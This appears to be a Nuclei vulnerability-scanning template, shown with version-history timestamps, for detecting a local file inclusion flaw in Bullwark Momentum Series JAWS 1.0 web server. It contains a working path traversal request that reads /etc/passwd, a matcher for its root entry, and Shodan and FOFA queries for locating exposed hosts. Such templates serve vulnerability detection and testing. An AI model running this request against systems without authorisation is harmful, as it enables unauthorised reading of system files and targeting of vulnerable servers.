nuclei-templates/vulnerabilities/other/bullwark-momentum-lfi.yaml

40 lines
1020 B
YAML
Raw Normal View History

id: bullwark-momentum-lfi
info:
name: Bullwark Momentum Series JAWS 1.0 - Local File Inclusion
author: pikpikcu
severity: high
description: Bullwark Momentum Series JAWS 1.0 is vulnerable to local file inclusion.
reference:
- https://www.exploit-db.com/exploits/47773
- http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 # software link
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
2021-09-16 15:54:33 +00:00
metadata:
version: Bullwark Momentum Series Web Server JAWS/1.0
2022-07-04 08:46:15 +00:00
shodan-query: Bullwark
fofa-query: "Bullwark"
tags: lfi,edb,bullwark
requests:
- raw:
- |
GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
X-Requested-With: XMLHttpRequest
Referer: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 200
2021-09-13 09:58:35 +00:00
- type: regex
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/07/22